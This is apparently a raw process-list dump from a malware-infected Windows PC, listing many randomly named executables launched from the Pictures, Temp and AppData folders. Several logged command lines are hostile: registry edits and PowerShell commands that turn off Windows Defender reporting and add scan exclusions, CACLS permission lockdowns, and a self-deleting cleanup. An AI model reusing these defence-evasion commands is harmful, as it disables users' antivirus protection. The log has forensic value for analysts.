1481727056-1528295059-10025_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-
3280135814-1481727056-1528295059-10025 1 -2147483646 "Software\Microsoft\Windows
Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\
ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
===============
ID: 13168, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8631367743 --mojo-
platform-channel-handle=5280 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 6648, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8631397662 --mojo-
platform-channel-handle=8836 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 2388, Name: OausKRQhaYx5IYt1vYpCc80n.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\OausKRQhaYx5IYt1vYpCc80n.exe"
===============
ID: 5728, Name: fyYM3BnrLqnui_QcizmcS8NP.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\fyYM3BnrLqnui_QcizmcS8NP.exe"
===============
ID: 14772, Name: AddInProcess32.exe, CommandLine: "C:\Windows\Microsoft.NET\
Framework64\v4.0.30319\AddInProcess32.exe"
===============
ID: 8048, Name: jYmgPA, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\ufTVJGQKRJAvHedhVT\jYmgPA"
===============
ID: 14576, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8644289876 --mojo-
platform-channel-handle=8976 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 15628, Name: NMN2nF0rpT.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\uWQ4axEW\NMN2nF0rpT.exe"
===============
ID: 8828, Name: FQHLmn, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" - --silent --allusers=0
===============
ID: 11168, Name: FQHLmn, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" --type=crashpad-handler /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\
Users\CONSULT SOIL TESTING\AppData\Roaming\Opera Software\Opera Stable\
crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --
annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --
annotation=ver=97.0.4719.83 --initial-client-
data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x5ba933e0,0x5ba933f0,0x5ba933fc
===============
ID: 9812, Name: FQHLmn, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" --backend --install --import-browser-data=0 --
enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0
--general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1
--installfolder="C:\Users\CONSULT SOIL TESTING\AppData\Local\Programs\Opera" --
profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --
setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --
server-tracking-data=server_tracking_data --initial-pid=8828 --package-dir-
prefix="C:\Users\CONSUL~1\AppData\Local\Temp\.opera\Opera Installer Temp\
opera_package_20230419223645" --session-guid=aca3b1d4-bcea-4c77-b04c-cf725f6a5969
--server-tracking-
blob="[base64 value removed]" --silent --desktopshortcut=1 --wait-for-package --initial-proc-
handle=C804000000000000
===============
ID: 6824, Name: FQHLmn, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" --type=crashpad-handler /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\
Users\CONSULT SOIL TESTING\AppData\Roaming\Opera Software\Opera Stable\
crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --
annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --
annotation=ver=97.0.4719.83 --initial-client-
data=0x304,0x308,0x30c,0x2d4,0x310,0x5b1333e0,0x5b1333f0,0x5b1333fc
===============
ID: 10744, Name: OzCnVS, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\oLSFaWFOelWfunHyRx\OzCnVS"
===============
ID: 37680, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 59752, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "385104"
===============
ID: 65472, Name: svcservice.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\telemetry\svcservice.exe"
===============
ID: 91784, Name: vyoLvZ, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\wDfsOUkfCgHGTAKNAN\vyoLvZ" - /S
===============
ID: 16544, Name: lw10pD7.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\
Roaming\PdwOD8\lw10pD7.exe" --Admin IsNotAutoStart IsNotTask
===============
ID: 16936, Name: WinRAR.exe, CommandLine: "C:\Program Files\WinRAR\WinRAR.exe" "C:\
Users\CONSULT SOIL TESTING\Downloads\Install.7z"
===============
ID: 17920, Name: build2.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\
Local\ddf544b1-449c-4bdd-a583-fd1c0fa1c089\build2.exe"
===============
ID: 17944, Name: Install.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
Rar$EXb16936.42266\Install.exe"
===============
ID: 18484, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 20960, Name: svcservice.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\telemetry\svcservice.exe"
===============
ID: 105700, Name: hy6Hoelk1x_kEPvwubpgEET4.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\hy6Hoelk1x_kEPvwubpgEET4.exe"
===============
ID: 109104, Name: is-K5PRT.tmp, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
is-9TM11.tmp\is-K5PRT.tmp" /SL4 $50748 "C:\Users\CONSULT SOIL TESTING\Pictures\
Minor Policy\hy6Hoelk1x_kEPvwubpgEET4.exe" 2562561 56320
===============
ID: 14604, Name: UrmCt2gO0F7gGiBxtJEafvRR.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\UrmCt2gO0F7gGiBxtJEafvRR.exe"
===============
ID: 38636, Name: ijV6rJsB_BHz7r7pG16cQZzx.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\ijV6rJsB_BHz7r7pG16cQZzx.exe"
===============
ID: 38604, Name: GCJ7jIcwcnLDCpvNjpTYtJTH.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\GCJ7jIcwcnLDCpvNjpTYtJTH.exe"
===============
ID: 17724, Name: CHc2AuPyjWHfq9s2dMrP8HKh.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\CHc2AuPyjWHfq9s2dMrP8HKh.exe"
===============
ID: 12632, Name: Tg5MlmqsgMCHfF0xYHFR6e2V.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\Tg5MlmqsgMCHfF0xYHFR6e2V.exe"
===============
ID: 18204, Name: 97Fovac4wG3gxa3BsmHaNpZG.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\97Fovac4wG3gxa3BsmHaNpZG.exe"
===============
ID: 18676, Name: xjQinxGtGBGWCTQOIcI2SHL3.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\xjQinxGtGBGWCTQOIcI2SHL3.exe"
===============
ID: 18668, Name: 12x8yBTiIfFBAUMP8XL9FR00.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\12x8yBTiIfFBAUMP8XL9FR00.exe"
===============
ID: 18644, Name: AwCvEyv9Wp2vaRK1acEEpgsg.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\AwCvEyv9Wp2vaRK1acEEpgsg.exe"
===============
ID: 18712, Name: Rec419.exe, CommandLine: "C:\Program Files (x86)\FKDsoftFR\Rec419\
Rec419.exe"
===============
ID: 18728, Name: 6MpsqEM6tHxdRKveVmU4DXSZ.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\6MpsqEM6tHxdRKveVmU4DXSZ.exe"
===============
ID: 18832, Name: cmd.exe, CommandLine: cmd.exe /d /c bwsjhihxsxf.bat 3956101466505
===============
ID: 18864, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 18872, Name: is-E3SOI.tmp, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
is-NQ34P.tmp\is-E3SOI.tmp" /SL4 $207B2 "C:\Users\CONSULT SOIL TESTING\Pictures\
Minor Policy\6MpsqEM6tHxdRKveVmU4DXSZ.exe" 2562561 56320
===============
ID: 18884, Name: Zhcf2b7KCQFYNg6CsB_NaYQZ.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\Zhcf2b7KCQFYNg6CsB_NaYQZ.exe"
===============
ID: 18912, Name: Y9J1AhEb4sEX34ee_jM060cY.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\Y9J1AhEb4sEX34ee_jM060cY.exe"
===============
ID: 18936, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 19064, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 19136, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 19148, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 19320, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 19412, Name: oneetx.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
ID: 19420, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 19448, Name: ge486920.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP001.TMP\ge486920.exe
===============
ID: 19524, Name: cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /k echo Y|
CACLS "oneetx.exe" /P "CONSULT SOIL TESTING:N"&&CACLS "oneetx.exe" /P "CONSULT SOIL
TESTING:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "CONSULT SOIL TESTING:N"&&CACLS "..\
cb7ae701b3" /P "CONSULT SOIL TESTING:R" /E&&Exit
===============
ID: 19532, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 19540, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 19960, Name: ge486920.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP001.TMP\ge486920.exe
===============
ID: 19984, Name: WerFault.exe, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p
19448 -s 580
===============
ID: 20076, Name: conhost.exe, CommandLine: conhost.exe lyjxmdxahyk.dat
3956101466505
===============
ID: 20132, Name: forfiles.exe, CommandLine: "C:\Windows\System32\forfiles.exe" /p
c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0
/reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f
/v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
===============
ID: 20148, Name: foto0165.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
1000001051\foto0165.exe"
===============
ID: 20156, Name: forfiles.exe, CommandLine: "C:\Windows\System32\forfiles.exe" /p
c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0
/reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\
Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
===============
ID: 20232, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 20328, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 20364, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929472286
===============
ID: 20392, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20444, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20452, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20460, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20568, Name: un969304.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP002.TMP\un969304.exe
===============
ID: 20580, Name: forfiles.exe, CommandLine: "C:\Windows\System32\forfiles.exe" /p
c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0
/reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f
/v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
===============
ID: 20620, Name: un463571.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP003.TMP\un463571.exe
===============
ID: 20700, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20748, Name: pr721824.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP006.TMP\pr721824.exe
===============
ID: 20824, Name: cmd.exe, CommandLine: /C REG ADD "HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0
/reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v
"SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
===============
ID: 20840, Name: cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t
6 & del /f /q "C:\Users\CONSULT SOIL TESTING\Pictures\Minor Policy\
ayi6H9CyWLbMfxxhMvRVWcx9.exe" & exit
===============
ID: 20876, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 20916, Name: cmd.exe, CommandLine: /C REG ADD "HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0
/reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\
Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
===============
ID: 20988, Name: cmd.exe, CommandLine: /C REG ADD "HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0
/reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v
"SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
===============
ID: 21000, Name: fotocr20.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
1000002051\fotocr20.exe"
===============
ID: 21036, Name: reg.exe, CommandLine: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\
Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
===============
ID: 21088, Name: zirH4300.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP007.TMP\zirH4300.exe
===============
ID: 21144, Name: ziKf7847.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP008.TMP\ziKf7847.exe
===============
ID: 21160, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929475484
===============
ID: 21188, Name: it726891.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP009.TMP\it726891.exe
